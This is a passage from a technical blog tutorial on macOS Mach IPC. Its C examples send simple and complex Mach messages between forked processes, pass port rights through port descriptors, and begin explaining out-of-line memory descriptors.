MACH_MSG_TYPE_MAKE_SEND_ONCE);</span><br><span class="line">    send_msg.header.msgh_remote_port    = port;</span><br><span class="line">    send_msg.header.msgh_local_port     = replyPort;</span><br><span class="line">    send_msg.header.msgh_size           = <span class="built_in">sizeof</span>(send_msg);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// send it</span></span><br><span class="line">    <span class="type">mach_msg_return_t</span> mr = <span class="built_in">mach_msg_send</span>(&amp;send_msg.header);</span><br><span class="line">    <span class="built_in">assert</span>(mr == KERN_SUCCESS);</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;[sender] Message is sent.\n&quot;</span>);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// wait for the reply message</span></span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">mach_msg_receive_t</span> recv_msg;</span><br><span class="line">    recv_msg.recv_content.header.msgh_size          = <span class="built_in">sizeof</span>(recv_msg);</span><br><span class="line">    recv_msg.recv_content.header.msgh_local_port    = replyPort;</span><br><span class="line">    kr = <span class="built_in">mach_msg_receive</span>(&amp;recv_msg.recv_content.header);</span><br><span class="line">    <span class="built_in">assert</span>(kr == KERN_SUCCESS);</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;[sender] Got a Message\n&quot;</span>);</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;[sender] Text: %s | number: %d\n&quot;</span>, recv_msg.recv_content.texts, recv_msg.recv_content.integer);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">void</span> <span class="title">receiver</span><span 
class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="comment">// create a mach port with a receive right</span></span><br><span class="line">    <span class="type">mach_port_t</span> port;</span><br><span class="line">    <span class="type">kern_return_t</span> kr = <span class="built_in">mach_port_allocate</span>(<span class="built_in">mach_task_self</span>(), MACH_PORT_RIGHT_RECEIVE, &amp;port);</span><br><span class="line">    <span class="built_in">assert</span>(kr == KERN_SUCCESS);</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;[receiver] mach_port_allocate() created port right name %d\n&quot;</span>, port);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// add a send right to that port as well</span></span><br><span class="line">    kr = <span class="built_in">mach_port_insert_right</span>(<span class="built_in">mach_task_self</span>(), port, port, MACH_MSG_TYPE_MAKE_SEND);</span><br><span class="line">    <span class="built_in">assert</span>(kr == KERN_SUCCESS);</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;[receiver] mach_port_insert_right() inserted a send right\n&quot;</span>);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// register the port's send right with bootstrap so that other processes can look it up</span></span><br><span class="line">    kr = <span class="built_in">bootstrap_register</span>(bootstrap_port, <span class="string">&quot;io.github.kiprey&quot;</span>, port);</span><br><span class="line">    <span class="built_in">assert</span>(kr == KERN_SUCCESS);</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;[receiver] bootstrap_register()&#x27;ed our port\n&quot;</span>);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// wait for a message</span></span><br><span class="line">    
<span class="keyword">struct</span> <span class="title class_">mach_msg_receive_t</span> recv_msg;</span><br><span class="line">    recv_msg.recv_content.header.msgh_size          = <span class="built_in">sizeof</span>(recv_msg);</span><br><span class="line">    recv_msg.recv_content.header.msgh_local_port    = port;</span><br><span class="line">    kr = <span class="built_in">mach_msg_receive</span>(&amp;recv_msg.recv_content.header);</span><br><span class="line">    <span class="built_in">assert</span>(kr == KERN_SUCCESS);</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;[receiver] Got a Message\n&quot;</span>);</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;[receiver] Text: %s | number: %d | remote_port: %d\n&quot;</span>, recv_msg.recv_content.texts, recv_msg.recv_content.integer, recv_msg.recv_content.header.msgh_remote_port);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">mach_msg_send_t</span> send_msg;</span><br><span class="line">    <span class="built_in">strcpy</span>(send_msg.texts, <span class="string">&quot;Hello, I&#x27;m receiver.&quot;</span>);</span><br><span class="line">    send_msg.integer = <span class="number">2</span>;</span><br><span class="line"></span><br><span class="line">    <span class="comment">// note: reuse the received remote bits, i.e. MACH_MSG_TYPE_PORT_SEND_ONCE (== MACH_MSG_TYPE_MOVE_SEND_ONCE)</span></span><br><span class="line">    send_msg.header.msgh_bits           = recv_msg.recv_content.header.msgh_bits &amp; MACH_MSGH_BITS_REMOTE_MASK;</span><br><span class="line">    send_msg.header.msgh_remote_port    = recv_msg.recv_content.header.msgh_remote_port;</span><br><span class="line">    send_msg.header.msgh_local_port     = MACH_PORT_NULL;</span><br><span class="line">    send_msg.header.msgh_size           = <span class="built_in">sizeof</span>(send_msg);</span><br><span class="line"></span><br><span 
class="line">    <span class="comment">// send it</span></span><br><span class="line">    <span class="type">mach_msg_return_t</span> mr = <span class="built_in">mach_msg_send</span>(&amp;send_msg.header);</span><br><span class="line">    <span class="built_in">assert</span>(mr == KERN_SUCCESS);</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;[receiver] Message is sent.\n&quot;</span>);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">main</span><span class="params">(<span class="type">int</span> argc, <span class="type">const</span> <span class="type">char</span> *argv[])</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="keyword">if</span> (fork() == <span class="number">0</span>)</span><br><span class="line">        <span class="built_in">sender</span>();</span><br><span class="line">    <span class="keyword">else</span></span><br><span class="line">        <span class="built_in">receiver</span>();</span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>Output:</p><p><img src="/2021/12/mach_ipc_intro/image-20211229213351546.png" alt="image-20211229213351546"></p><p>You may wonder why the right type for replyPort is set to MACH_MSG_TYPE_MAKE_<strong>SEND_ONCE</strong>. Could it be MACH_MSG_TYPE_<strong>COPY_SEND</strong> instead? It can, and in that case the receiver gets an ordinary send right and may send mach messages to replyPort any number of times rather than <strong>just once</strong>.</p><h4 id="b-complex-message">b. 
complex message</h4><p>Remember the structure of a Mach message described earlier? A Mach message can carry simple data (as in the examples so far) as well as complex data (covered next). We now use a <strong>complex</strong> mach message to pass along a mach port for communication.</p><blockquote><p>To keep the explanation short, this part assumes the material above is fully understood.</p></blockquote><h5 id="1-sender-2">1) sender</h5><p>The sender now wants to hand its newly created replyPort (already allocated, with the send right inserted, and so on) to the receiver. How can it do that?</p><p>It can pass a <strong>port descriptor</strong> directly in the <strong>message body</strong>. First we need the type definition of the mach msg to be sent:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">typedef</span> <span class="keyword">struct</span> &#123;</span><br><span class="line">  <span class="type">mach_msg_header_t</span> header;</span><br><span class="line">  <span class="type">mach_msg_size_t</span> msgh_descriptor_count;</span><br><span class="line">  <span class="type">mach_msg_port_descriptor_t</span> descriptor;</span><br><span class="line">&#125; <span class="type">mach_msg_complex_send_t</span>;</span><br></pre></td></tr></table></figure><p>Here, header needs no explanation; <code>msgh_descriptor_count</code> says how many descriptors follow; and the descriptor field of type <code>mach_msg_port_descriptor_t</code> describes the port being transferred.</p><p>Every <code>descriptor</code>, whatever its kind, keeps its <code>type</code> in the same position so that the kernel can tell the kinds apart. Below is the most generic descriptor declaration, which occupies 12 bytes (three 32-bit words); the port descriptor has the same size, while some other kinds, such as OOL descriptors on 64-bit, are larger:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">typedef</span> <span class="keyword">struct</span>&#123;</span><br><span class="line">    <span class="type">natural_t</span>                     pad1;</span><br><span class="line">    <span class="type">mach_msg_size_t</span>               
pad2;</span><br><span class="line">    <span class="type">unsigned</span> <span class="type">int</span>                  pad3 : <span class="number">24</span>;</span><br><span class="line">    <span class="type">mach_msg_descriptor_type_t</span>    type : <span class="number">8</span>;</span><br><span class="line">&#125; <span class="type">mach_msg_type_descriptor_t</span>;</span><br></pre></td></tr></table></figure><p>The port descriptor is defined as follows:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">typedef</span> <span class="keyword">struct</span>&#123;</span><br><span class="line">  <span class="type">mach_port_t</span>                   name;</span><br><span class="line">  <span class="type">mach_msg_size_t</span>               pad1;</span><br><span class="line">  <span class="type">unsigned</span> <span class="type">int</span>                  pad2 : <span class="number">16</span>;</span><br><span class="line">  <span class="type">mach_msg_type_name_t</span>          disposition : <span class="number">8</span>;</span><br><span class="line">  <span class="type">mach_msg_descriptor_type_t</span>    type : <span class="number">8</span>;</span><br><span class="line">&#125; <span class="type">mach_msg_port_descriptor_t</span>;</span><br></pre></td></tr></table></figure><p>where</p><ul><li><p><code>name</code>: the port to transfer. Here it is set to <strong>replyPort</strong></p></li><li><p><code>disposition</code>: the right to transfer for that port. Here it is set to <strong>MACH_MSG_TYPE_PORT_SEND</strong></p><p>The possible values are:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span 
class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment"> *  Values received/carried in messages.  Tells the receiver what</span></span><br><span class="line"><span class="comment"> *  sort of port right he now has.</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> *  MACH_MSG_TYPE_PORT_NAME is used to transfer a port name</span></span><br><span class="line"><span class="comment"> *  which should remain uninterpreted by the kernel.  (Port rights</span></span><br><span class="line"><span class="comment"> *  are not transferred, just the port name.)</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> MACH_MSG_TYPE_PORT_NONE         0</span></span><br><span class="line"></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> MACH_MSG_TYPE_PORT_NAME         15</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> MACH_MSG_TYPE_PORT_RECEIVE      MACH_MSG_TYPE_MOVE_RECEIVE</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> MACH_MSG_TYPE_PORT_SEND         MACH_MSG_TYPE_MOVE_SEND</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> MACH_MSG_TYPE_PORT_SEND_ONCE    MACH_MSG_TYPE_MOVE_SEND_ONCE</span></span><br></pre></td></tr></table></figure></li><li><p><code>type</code>: the kind of descriptor being transferred. Here it is set to 
<strong>MACH_MSG_PORT_DESCRIPTOR</strong></p><p>Because <strong>the port descriptor is not the only kind</strong> of descriptor, each descriptor has to <strong>state its type explicitly</strong> so that the kernel can process it. The following types exist:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">define</span> MACH_MSG_PORT_DESCRIPTOR                0</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> MACH_MSG_OOL_DESCRIPTOR                 1</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> MACH_MSG_OOL_PORTS_DESCRIPTOR           2</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> MACH_MSG_OOL_VOLATILE_DESCRIPTOR        3</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> MACH_MSG_GUARDED_PORT_DESCRIPTOR        4</span></span><br></pre></td></tr></table></figure></li></ul><p>Code example:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">send_msg.msgh_descriptor_count      = <span class="number">1</span>;</span><br><span class="line">send_msg.descriptor.name            = replyPort;</span><br><span class="line">send_msg.descriptor.disposition     = MACH_MSG_TYPE_PORT_SEND;</span><br><span class="line">send_msg.descriptor.type            = MACH_MSG_PORT_DESCRIPTOR;</span><br></pre></td></tr></table></figure><p>Finally, before calling mach_msg_send, do not forget to add MACH_MSGH_BITS_COMPLEX to the msgh_bits field to mark the message as a <strong>complex message</strong>. Otherwise the descriptors are treated as plain <strong>inline data</strong>.</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span 
class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// note: mark the outgoing message as complex</span></span><br><span class="line">send_msg.header.msgh_bits = <span class="built_in">MACH_MSGH_BITS_SET</span>(MACH_MSG_TYPE_COPY_SEND, <span class="number">0</span>, <span class="number">0</span>, MACH_MSGH_BITS_COMPLEX);</span><br></pre></td></tr></table></figure><h5 id="2-receiver-2">2) receiver</h5><p>The receiver only has to receive the data from the sender and take the port name out of the port descriptor; after that it can start communicating.</p><p>What it needs to do is fairly simple:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// wait for a message</span></span><br><span class="line"><span class="type">mach_msg_complex_receive_t</span> recv_msg;</span><br><span class="line">recv_msg.recv_content.header.msgh_size          = <span class="built_in">sizeof</span>(recv_msg);</span><br><span class="line">recv_msg.recv_content.header.msgh_local_port    = port;</span><br><span class="line">kr = <span class="built_in">mach_msg_receive</span>(&amp;recv_msg.recv_content.header);</span><br><span class="line"></span><br><span class="line"><span class="type">mach_msg_simple_send_t</span> send_msg;</span><br><span class="line"><span class="built_in">strcpy</span>(send_msg.texts, <span class="string">&quot;Hello, I&#x27;m receiver.&quot;</span>);</span><br><span class="line">send_msg.integer = <span class="number">2</span>;</span><br><span 
class="line"></span><br><span class="line">send_msg.header.msgh_bits           = recv_msg.recv_content.descriptor.disposition;</span><br><span class="line">send_msg.header.msgh_remote_port    = recv_msg.recv_content.descriptor.name;</span><br><span class="line">send_msg.header.msgh_local_port     = MACH_PORT_NULL;</span><br><span class="line">send_msg.header.msgh_size           = <span class="built_in">sizeof</span>(send_msg);</span><br><span class="line"></span><br><span class="line"><span class="comment">// send it</span></span><br><span class="line"><span class="type">mach_msg_return_t</span> mr = <span class="built_in">mach_msg_send</span>(&amp;send_msg.header);</span><br></pre></td></tr></table></figure><h5 id="3-代码示例-2">3) Code example</h5><p>The example code is as follows:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span 
class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span 
class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;mach/mach.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;servers/bootstrap.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;unistd.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdlib.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;assert.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="keyword">typedef</span> <span class="keyword">struct</span> 
&#123;</span><br><span class="line">    <span class="type">mach_msg_header_t</span> header;</span><br><span class="line">    <span class="type">char</span> texts[<span class="number">0x20</span>];</span><br><span class="line">    <span class="type">int</span> integer;</span><br><span class="line">&#125; <span class="type">mach_msg_simple_send_t</span>;</span><br><span class="line"></span><br><span class="line"><span class="keyword">typedef</span> <span class="keyword">struct</span> &#123;</span><br><span class="line">    <span class="type">mach_msg_simple_send_t</span> recv_content;</span><br><span class="line">    <span class="type">mach_msg_trailer_t</span> trailer;</span><br><span class="line">&#125; <span class="type">mach_msg_simple_receive_t</span>;</span><br><span class="line"></span><br><span class="line"><span class="keyword">typedef</span> <span class="keyword">struct</span> &#123;</span><br><span class="line">  <span class="type">mach_msg_header_t</span> header;</span><br><span class="line">  <span class="type">mach_msg_size_t</span> msgh_descriptor_count;</span><br><span class="line">  <span class="type">mach_msg_port_descriptor_t</span> descriptor;</span><br><span class="line">&#125; <span class="type">mach_msg_complex_send_t</span>;</span><br><span class="line"></span><br><span class="line"><span class="keyword">typedef</span> <span class="keyword">struct</span> &#123;</span><br><span class="line">    <span class="type">mach_msg_complex_send_t</span> recv_content;</span><br><span class="line">    <span class="type">mach_msg_trailer_t</span> trailer;</span><br><span class="line">&#125; <span class="type">mach_msg_complex_receive_t</span>;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">void</span> <span class="title">sender</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="comment">// Wait briefly so that the 
receiver can register with bootstrap</span></span><br><span class="line">    <span class="built_in">usleep</span>(<span class="number">100</span>);</span><br><span class="line">    <span class="comment">// Look up the mach port through bootstrap</span></span><br><span class="line">    <span class="type">mach_port_t</span> port;</span><br><span class="line">    <span class="type">kern_return_t</span> kr = <span class="built_in">bootstrap_look_up</span>(bootstrap_port, <span class="string">&quot;io.github.kiprey&quot;</span>, &amp;port);</span><br><span class="line">    <span class="built_in">assert</span>(kr == KERN_SUCCESS);</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;[sender] bootstrap_look_up() returned port right name %d\n&quot;</span>, port);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// Build the message to send</span></span><br><span class="line">    <span class="type">mach_msg_complex_send_t</span> send_msg;</span><br><span class="line"></span><br><span class="line">    <span class="comment">// Create a replyPort that the receiver will send its reply to</span></span><br><span class="line">    <span class="type">mach_port_t</span> replyPort;</span><br><span class="line">    kr = <span class="built_in">mach_port_allocate</span>(<span class="built_in">mach_task_self</span>(), MACH_PORT_RIGHT_RECEIVE, &amp;replyPort);</span><br><span class="line">    <span class="built_in">assert</span>(kr == KERN_SUCCESS);</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;[sender] mach_port_allocate() created port right name %d\n&quot;</span>, replyPort);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// Add a send right to this port</span></span><br><span class="line">    kr = <span class="built_in">mach_port_insert_right</span>(<span class="built_in">mach_task_self</span>(), replyPort, replyPort, MACH_MSG_TYPE_MAKE_SEND);</span><br><span class="line">    <span 
class="built_in">assert</span>(kr == KERN_SUCCESS);</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;[sender] mach_port_insert_right() inserted a send right\n&quot;</span>);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// Note: the message must be marked as complex here</span></span><br><span class="line">    send_msg.header.msgh_bits           = <span class="built_in">MACH_MSGH_BITS_SET</span>(MACH_MSG_TYPE_COPY_SEND, <span class="number">0</span>, <span class="number">0</span>, MACH_MSGH_BITS_COMPLEX);</span><br><span class="line">    send_msg.header.msgh_remote_port    = port;</span><br><span class="line">    send_msg.header.msgh_local_port     = MACH_PORT_NULL;</span><br><span class="line">    send_msg.header.msgh_size           = <span class="built_in">sizeof</span>(send_msg);</span><br><span class="line">    <span class="comment">// Exactly one descriptor is being passed</span></span><br><span class="line">    send_msg.msgh_descriptor_count      = <span class="number">1</span>;</span><br><span class="line">    send_msg.descriptor.name            = replyPort;</span><br><span class="line">    send_msg.descriptor.disposition     = MACH_MSG_TYPE_PORT_SEND;</span><br><span class="line">    send_msg.descriptor.type            = MACH_MSG_PORT_DESCRIPTOR;</span><br><span class="line"></span><br><span class="line">    <span class="comment">// Send it</span></span><br><span class="line">    <span class="type">mach_msg_return_t</span> mr = <span class="built_in">mach_msg_send</span>(&amp;send_msg.header);</span><br><span class="line">    <span class="built_in">assert</span>(mr == KERN_SUCCESS);</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;[sender] Message is sent.\n&quot;</span>);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// Wait for a message</span></span><br><span class="line">    <span class="type">mach_msg_simple_receive_t</span> 
recv_msg;</span><br><span class="line">    recv_msg.recv_content.header.msgh_size          = <span class="built_in">sizeof</span>(recv_msg);</span><br><span class="line">    recv_msg.recv_content.header.msgh_local_port    = replyPort;</span><br><span class="line">    kr = <span class="built_in">mach_msg_receive</span>(&amp;recv_msg.recv_content.header);</span><br><span class="line">    <span class="built_in">assert</span>(kr == KERN_SUCCESS);</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;[sender] Got a Message\n&quot;</span>);</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;[sender] Text: %s | number: %d\n&quot;</span>, recv_msg.recv_content.texts, recv_msg.recv_content.integer);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">void</span> <span class="title">receiver</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="comment">// Create a mach port with a receive right</span></span><br><span class="line">    <span class="type">mach_port_t</span> port;</span><br><span class="line">    <span class="type">kern_return_t</span> kr = <span class="built_in">mach_port_allocate</span>(<span class="built_in">mach_task_self</span>(), MACH_PORT_RIGHT_RECEIVE, &amp;port);</span><br><span class="line">    <span class="built_in">assert</span>(kr == KERN_SUCCESS);</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;[receiver] mach_port_allocate() created port right name %d\n&quot;</span>, port);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// Add a send right to this port</span></span><br><span class="line">    kr = <span class="built_in">mach_port_insert_right</span>(<span class="built_in">mach_task_self</span>(), port, port, 
MACH_MSG_TYPE_MAKE_SEND);</span><br><span class="line">    <span class="built_in">assert</span>(kr == KERN_SUCCESS);</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;[receiver] mach_port_insert_right() inserted a send right\n&quot;</span>);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// Register the port&#x27;s send right with bootstrap so that other processes can look it up</span></span><br><span class="line">    kr = <span class="built_in">bootstrap_register</span>(bootstrap_port, <span class="string">&quot;io.github.kiprey&quot;</span>, port);</span><br><span class="line">    <span class="built_in">assert</span>(kr == KERN_SUCCESS);</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;[receiver] bootstrap_register()&#x27;ed our port\n&quot;</span>);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// Wait for a message</span></span><br><span class="line">    <span class="type">mach_msg_complex_receive_t</span> recv_msg;</span><br><span class="line">    recv_msg.recv_content.header.msgh_size          = <span class="built_in">sizeof</span>(recv_msg);</span><br><span class="line">    recv_msg.recv_content.header.msgh_local_port    = port;</span><br><span class="line">    kr = <span class="built_in">mach_msg_receive</span>(&amp;recv_msg.recv_content.header);</span><br><span class="line">    <span class="built_in">assert</span>(kr == KERN_SUCCESS);</span><br><span class="line">    <span class="built_in">assert</span>(recv_msg.recv_content.msgh_descriptor_count == <span class="number">1</span>);</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;[receiver] Got a Message\n&quot;</span>);</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;[receiver] remote_port: %d\n&quot;</span>, recv_msg.recv_content.descriptor.name);</span><br><span class="line"></span><br><span 
class="line">    <span class="type">mach_msg_simple_send_t</span> send_msg;</span><br><span class="line">    <span class="built_in">strcpy</span>(send_msg.texts, <span class="string">&quot;Hello, I&#x27;m receiver.&quot;</span>);</span><br><span class="line">    send_msg.integer = <span class="number">2</span>;</span><br><span class="line"></span><br><span class="line">    <span class="comment">// Note: the disposition here is MACH_MSG_TYPE_PORT_SEND (equal to MACH_MSG_TYPE_MOVE_SEND), as set by the sender</span></span><br><span class="line">    send_msg.header.msgh_bits           = recv_msg.recv_content.descriptor.disposition;</span><br><span class="line">    send_msg.header.msgh_remote_port    = recv_msg.recv_content.descriptor.name;</span><br><span class="line">    send_msg.header.msgh_local_port     = MACH_PORT_NULL;</span><br><span class="line">    send_msg.header.msgh_size           = <span class="built_in">sizeof</span>(send_msg);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// Send it</span></span><br><span class="line">    <span class="type">mach_msg_return_t</span> mr = <span class="built_in">mach_msg_send</span>(&amp;send_msg.header);</span><br><span class="line">    <span class="built_in">assert</span>(mr == KERN_SUCCESS);</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;[receiver] Message is sent.\n&quot;</span>);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">main</span><span class="params">(<span class="type">int</span> argc, <span class="type">const</span> <span class="type">char</span> *argv[])</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    fork() ? 
<span class="built_in">sender</span>() : <span class="built_in">receiver</span>();</span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>The output is as follows:</p><p><img src="/2021/12/mach_ipc_intro/image-20211229233517941.png" alt="image-20211229233517941"></p><h3 id="3-mach-OOL-通信">3. mach OOL communication</h3><p>When a process needs to pass a <strong>large</strong> amount of data to its peer, the inline data of a simple message is no longer adequate, because copying the data into the message body is expensive. Instead, we can use the <strong>OOL (out-of-line) descriptor</strong> of a mach complex message to <strong>pass memory pages</strong>.</p><h4 id="a-sender">a. sender</h4><p>First, we need to define the structure of the complex mach message:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">typedef</span> <span class="keyword">struct</span></span><br><span class="line">&#123;</span><br><span class="line">    <span class="type">mach_msg_header_t</span> header;</span><br><span class="line">    <span class="type">mach_msg_size_t</span> msgh_descriptor_count;</span><br><span class="line">    <span class="type">mach_msg_ool_descriptor_t</span> descriptor;</span><br><span class="line">&#125; <span 